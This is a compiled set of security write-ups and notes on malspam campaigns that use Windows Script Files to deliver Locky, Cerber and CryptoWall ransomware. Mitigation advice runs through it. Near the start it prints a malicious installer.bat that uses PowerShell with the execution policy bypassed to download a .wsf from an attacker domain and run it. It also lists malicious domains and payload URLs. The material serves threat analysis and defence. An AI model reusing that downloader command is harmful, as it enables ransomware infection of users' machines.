as malwares and ransomwares find a way to exploit the wsf files

https://malwarebreakdown.com/2016/09/03/malspam-contains-zip-with-wsf-and-drops-locky/
https://malwarebreakdown.com/2016/09/03/malspam-contains-zipd-wsf-that-retrieves-locky/
https://blog.cloudmark.com/2016/07/18/locky-actors-shift-to-wsf-attachments/
https://blogs.forcepoint.com/security-labs/cerber-actor-distributing-malware-over-e-mail-wsf-files


WSF is a Windows Script File.

“WSF files are designed to allow a mix of scripting languages within a single file, and are opened and run by the Windows Script Host (WSH).”

The following is an example of a site pushing an Installer.zip to be downloaded, The scumming site is: http://webtrafficsuccess.xyz/gateway.php?target=4b0b95d8142
It contains
a file named by installer.bat, with a size of 2,014 bytes
2 folders, named by data and lang

within the data folder, there is a file of setup.dat with a size of 196,662 bytes

within the lang folder, there are 10 files, claiming to be language files of Turkish, Spanish, Romanian, Italian, Greek, German, French, English, Danish, Czech, with ini extension, and the same file size, that is 6,615 bytes.
It starts with
‰PNG

IHDR \r¨f sRGB ®Îé gAMA ±üa pHYs Ä

and ended with
….
‡ à0 €Ã@ p Àa 8 ‡ à0 €Ã@ p ÀYˆþË[ÂCÉò IEND®B`‚

the installer.bat file consists the folllowing scripts:
@ECHO OFF
ECHO Downloading the update files, please wait..
IF NOT EXIST %TEMP%\sys00.wsf powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile(‘http://trafficreactor.club/download.php?c=IMDB’,’%TEMP%\sys00.wsf’);
START %TEMP%\sys00.wsf
CLS
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################
REM ##################


https://sentinelone.com/blogs/wsf-files-rise/
WSF Files On The Rise
By SentinelOne, November 30, 2016

Like many scripting and development languages, Windows script files (WSF) can be a powerful tool when used for good. Unfortunately, when it’s in the hands of an attacker, it can be used to create malicious WSF files with the purpose of creating malware. One example of this is the recent proliferation of “Locky”.

Locky Is Spreading

Millions of spam emails have been sent to spread the Locky ransomware. Back in October, 1.3 million emails were sent with the subject “Travel Itinerary.” These emails contained a WSF attachment within a zip archive.

In another example, a similar email was sent with “complaint letter” as the subject. In this case, the email was said to come from a client and contain the text “regarding the data file you provided.”

A third example of an attack was a fictitious notification about a series of “suspicious bank operations” that was detected by an account manager with the US Office of Personnel Management.

“Dear [NAME], Carole from the bank notified us about the suspicious movements on our account. Examine the attached scanned record. If you need more information, feel free to contact me.”

In this case, the Locky ransomware is impersonating an OPM representative and targeting government contractors who potentially had their information stolen.

With each of these examples, if the zip archive was opened and the file successfully ran, it installed the Locky ransomware on the computer. After installation, the malware encrypts the files on the machine.

Why Did They Use A WSF File To Spread Malware?

Many email clients automatically block a standard executable (.exe) file. However, in some cases, they will allow a WSF file to be downloaded and run. This allows the script to get around the internal security built into many email programs. Another factor is while many users have been told not to download and run executable files, they’re not familiar with the WSF extension and are therefore more likely to run it.

Exploits Are Constantly Changing

It’s a common practice to change the format of attachments within spam campaigns in an attempt to stay ahead of the security vendors. For example, the Locky ransomware has been seen with both WSF and JavaScript attachments. So far, at least 10 different downloader variants have been found.

How To Protect Your Business From Ransomware Like Locky

Protecting your business from ransomware involves the following:

Use up-to-date endpoint protection software
Backup your files so that if your machine becomes infected with ransomware it can be restored
Make sure your operating system is kept up-to-date
Provide proper training for employees on malware
These can include being wary of any attachments that they are not expecting from a person.
Even if they know the person and get an attachment they aren’t expecting, ask them to contact them by phone and ask if they sent the attachment.
Make your employees aware that attacks can come from a variety of attachment types (including some not listed here) and they should be cautious before opening any attachment.

Conclusion

The creators of ransomware are getting more creative every day and are highly motivated by a possible payday. Improving education about the potential dangers, backing up your files, and making sure your endpoint security protection is up-to-date are some of the best ways to reduce the risk.

Related Posts

Locky Ransomware Has Evolved—The Dangers of PowerShell Scripting

It’s no secret that ransomware is taking the cybersecurity community by storm. In fact, a…
KillDisk Malware Gets Ransomware Upgrade

KillDisk is a frightening name among security researchers. This is the malware that was used…
Windows Shortcut File or .LNK Files Sneaking In Malware

Malicious actors keep us on our toes as they move from executables (.EXE) and scripts…

spam emails https://sentinelone.com/blogs/phishing-how-can-we-stop-falling-for-the-oldest-trick-in-the-book/



View story at Medium.com
Ransomware delivered using .wsf (Windows Script File)
Kevin Beaumont, Jan 21, 2016
InfoSec, from the trenches of reality.
kevin.beaumont@gmail.com, @gossithedog

The emails vary, but look something like this:

The zip file contains a file called MESSAGE_123123123123.doc (lots of spaces).wsf:

.wsf is Windows Script File, and is executed by Windows as full blown executable VBScript. In testing some mail filtering doesn’t block .wsf by default?-?Exchange and Outlook will also just pass it through to the user. This one has a real shot at getting to your users via email unless you change some configuration defaults.

The string highlighted above is encrypted VBE, surrounded by random words for IDS evasion. It works really well?-?not one AV provider or IDS system we tried flagged it.

I decrypted the VBE code:

As you can see, it grabs kb37893902w.exe from updatesarecoming1000.space. When investigations started just one AV provider detected the payload under Heuristics. I also manually detonated the payload with various AV providers with heuristics, cloud markers etc enabled?-?nothing spotted it. Unsurprisingly, it is crypted.

The payload posts to the following sites (a further list is later).

It also, curiously, removes local admin rights for the user. It’s a ransomware:

“Congratulations! You have become part of large community #CryptoWall.”

It also attempts to contact http://www.petroinform.net, however the author made a coding mistake and the call never completes.

Recommendations
Block .wsf files by default at your email gateway, including when inside ZIP files. Your users don’t ever need them.
On the client use AppLocker to restrict random VBScript and .exe from %appdata%

Threat indicators
.wsf email: SHA256 82f25f30b973e899f6feae5e781f02076d31c54e6fd8a0a367e2efef9c76f441
.zip: SHA256 5fcff95bd25a853fd95c2f69801555cf21ea9b022815ce2d392412c2a30043f0

Domains
e-minunat.ro
balustradydrewniane.pl
ahtubafishing.com
lptech.sk
dermalightcr.com
dorisbociort.ro
vladoveverka.sk
inicc.yucatan.gob.mx

Antivirus cover
Sophos will later detection as Troj/Agent-AQAT and Troj/VBSDl-U

not one AV provider https://www.virustotal.com/en/file/82f25f30b973e899f6feae5e781f02076d31c54e6fd8a0a367e2efef9c76f441/analysis/1453417066/
kb37893902w.exe https://www.virustotal.com/en/file/84680ea2cf3a32b95b6e761552f9bdaacacb0fe5469f9b013086232689b8e19c/analysis/


https://blogs.technet.microsoft.com/mmpc/2016/07/23/nemucod/
Nemucod dot dot..WSF
Francis Tan Seng and Alden Pornasdoro
MMPC
msft-mmpc, July 23, 2016

The latest Nemucod campaign shows the malware distributing a spam email attachment with a .wsf extension, specifically ..wsf (with a double dot) extension.

It is a variation of what has been observed since last year (2015) – the TrojanDownloader:JS/Nemucod malware downloader using JScript. It still spreads through spam email attachment, typically inside a .zip file, using a file name of interest with .js or .jse as extension.

The following screenshots show how the malicious file attachment looks like in the recent campaign:

Figure 1: Example of how an email spam containing the latest version of Nemucod might look like


Figure 2: Example of how Nemucod malware looks like when extracted and opened with an archive viewer

What the double dots mean: Social engineering for unsuspecting eyes

As seen in the following file name samples, the double dot paired with the uncommon .wsf extension creates an illusion that the file name was either abbreviated, was intentionally omitted, or shortened by the system because it was too long:

profile-d39a..wsf
profile-e3de..wsf
profile-e7dc..wsf
profile-f8d..wsf
profile-fb50..wsf
spreadsheet_07a..wsf
spreadsheet_1529..wsf
spreadsheet_2c3b..wsf
spreadsheet_36ff..wsf
spreadsheet_3a8..wsf

Some might look at the sample file names and assume that they might originally have been a long unique string identifier consisting of random letters and numbers that could be a transaction ID, receipt number or even user ID:

profile-d39as1u3e8k9i3m4wsf
profile-e3dee1uwl8s10f3m4wsf
profile-e7dc4d1u3e83m4wsf
profile-f8dsdwsfe8k4i38wsf
profile-fb50s1u3l8k9i3m4wsf
spreadsheet_07as133e3k9i3e4wsf
spreadsheet_1529s15se8f9i3o6wsf
spreadsheet_2c3bs1u5dfk9i3m6wsf
spreadsheet_36ffs1ure8koei3d5ws
spreadsheet_3a8s1udwsf8s9i323wsf

However, this is not the case. These are script files that might contain malicious code which could harm your system.

Underneath the WSF

Windows Scripting File is a text document containing Extensible Markup Language (XML) code. It incorporates several features that offer you increased scripting flexibility. Because Windows script files are not specific to a script language, the underlying code can have either JavaScript or VBScript, depending on language declaration in the file. WSF acts as a container.

Underneath the WSF is the same typical Nemucod JScript code.


Figure 3: Nemucod code inside WSF: has encrypted code and the decryption is written under @cc_on (conditional compilation)

This Nemucod version leverages the @cc_on (conditional compilation) command. Such a command can possibly evade AV scanner detection. It tricks the AV scanners to think the command is part of a comment, thus preventing the AV scanners from interpreting it as an executable code.

Upon code decryption, the following URLs – where the malware payload is being hosted – are revealed:

hxxp://right-livelihoods.org/rpvch
hxxp://nmfabb.com/rgrna1gc
hxxp://www.fabricemontoyo.com/v8li8

Recent spam campaign and trends

The latest Nemucod telemetry for the past 15 days shows that it has constantly been active, although there haven’t been any huge spikes.


Figure 4: Daily detection trend for Nemucod. These are the unique machine encounters per day


Figure 5: Geographic distribution of Nemucod. Data taken from July 3 to July 18,2016

Other than using ..wsf and @cc_on technique, we’ve also seen different and old tricks used as part of its social engineering tactics. This includes, but is not limited to:

Double extension (for example: pdf.js)
Invoice, receipt, and delivery related file names such as DHL, FedEx delivery, and so forth

Nemucod infection chain

Nemucod infection chain showing spam email distributing WSF which downloads and runs malware

Just like the Nemucod campaigns before this, the malware downloader payload includes ransomware, such as:

Ransom:Win32/Locky
Ransom:Win32/Cerber

Mitigation and prevention

To avoid falling prey from this new Nemucod malware campaign:

Use an up-to-date real-time antimalware product, such as Windows Defender for Windows 10.
Ensure that Microsoft Active Protection Service has been enabled.
Use Office 365 Advanced Threat Protection. It has a machine learning capability to help your network administrators block dangerous email threats. See the Overview of Advanced Threat Protection in Exchange: new tools to stop unknown attacks, for details.
Be wary of emails with attachments having .wsf file extensions. It is uncommon and quite suspicious for people to send legitimate applications with such extensions through email. Attachments with “.wsf” extension and, more importantly, double dot extension are more likely to be dubious. Do not click or open these attachments.
Use the AppLocker group policy to prevent dubious software from running. Add .wsf to the file types to block in your AppLocker Group Policy.
Though ransomware and macro-based malware are on the rise, there’s still something that you or your administrators can proactively do:
Ensure that a strong password policy is implemented throughout the enterprise.
Disable the loading of macros in Office programs.
Disable macro loading through the Group Policy settings.
Keep your software up-to-date to mitigate possible software exploits.
Protect derived domain credentials with Credential Guard for Windows 10 Enterprise.
Secure your code integrity with Device Guard for Windows 10 Enterprise.
Secure the lateral account movement in your enterprise.
Use two-factor authentication with Microsoft Passport and Windows Hello.

TrojanDownloader:JS/Nemucod https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDownloader:JS/Nemucod
@cc_on (conditional compilation) https://msdn.microsoft.com/en-us/library/8ka90k2e(v=vs.84).aspx
Ransom:Win32/Locky https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Locky
Ransom:Win32/Cerber https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Cerber


https://www.theregister.co.uk/2016/07/25/ms_warns_of_script_worms/
MS warns of ..WSF file worm
Richard Chirgwin, 25 Jul 2016 at 04:33

Microsoft has pulled apart a current malware campaign, and is warning against e-mails with a double-dotted script file attached.

The Nemucod malware isn’t new, but what Redmond discusses in this Technet post is a wrinkle designed to trap unwary eyes: a Windows Script File (wsf) attachment with an extra dot in the file extension – ..wsf instead of .wsf. [See! The headline isn’t a tyop – Ed]

Describing it as “social engineering for unsuspecting eyes”, Microsoft’s post says the attack arrives as a .zip file, and the file list (containing the payload) pops up when viewed in an archive viewer. Microsoft says the double-dotting is probably meant to make someone think it was just a long filename that’s been truncated by the system.

As in past Nemucod campaigns, the payload is designed to install either the Locky or Cerber ransomware. Up-to-date malware protection should be blocking the attack, Microsoft’s post states. ®

this Technet post https://blogs.technet.microsoft.com/mmpc/2016/07/23/nemucod/


https://bestsecuritysearch.com/malicious-wsf-files-zip-archives-malware/
Malicious WSF Files Within ZIP Archives Deliver Malware
Gergana Ivanova
2016-10-13T17:09:24+00:00

Symantec announced some observations from the past three months. They have monitored a major increase in the number of email-based attacks that use malicious Windows Script File (WSF) attachments.

The new tactic is implemented mainly by ransomware groups. This is not a surprise as many users are suspicious of emails from unknown sources that contain PDF, executables or Microsoft Office documents and avoid opening these files. So the malware attackers are always trying to trick users and their AV software by using new tactics. The security researchers have recently blocked series of new email campaigns that distribute Locky ransomware via malicious WSF files. The company’s analysis show that the malicious WSF files come packed into .ZIP archives. The emails impersonate deliveries of travel agencies, compliant letters, messages from major airlines, etc. An eventual run of the WSF file leads to installation of Locky or other malware on the victim’s computer.

This is not the first time when crooks shift their distribution plan as in August we have reported how they started using DLL files for the Locky’s malicious scheme.

But the recent email attack campaigns that use WSF attachments are not only observed for Locky distributions. The number of blocked emails containing malicious WSF attachments increased from 22 000 in June to more than 2.2 million in September.


Image Source: Symantec, “Number of blocked emails containing malicious WSF attachments by month”

Why Windows Script Host (WSH) Files?

Researchers explain:
“WSF files are designed to allow a mix of scripting languages within a single file, and are opened and run by the Windows Script Host (WSH).”

It is highly possible that the users don’t set their email services to automatically block files with a .wsf extension so they can be executed as an executable file. Furthermore, the new practice could mislead the AV software if the vendors have not improved their defenses against certain malicious file types. Thus the attack slip through defenses and the infection starts without any alert that something wrong is going to happen once you open the .wsf file.

Yet another reason for choosing WSF files could be that this file type is rarely used by most of the users. So they are more curious to see what will be displayed after they open the file and don’t even expect what could be the risk once the file is running.

In Conclusion..

Note from the researchers:
“In a constantly shifting threat landscape, organizations need to remain vigilant and aware that threats can come from new and unanticipated sources.”


Advertisements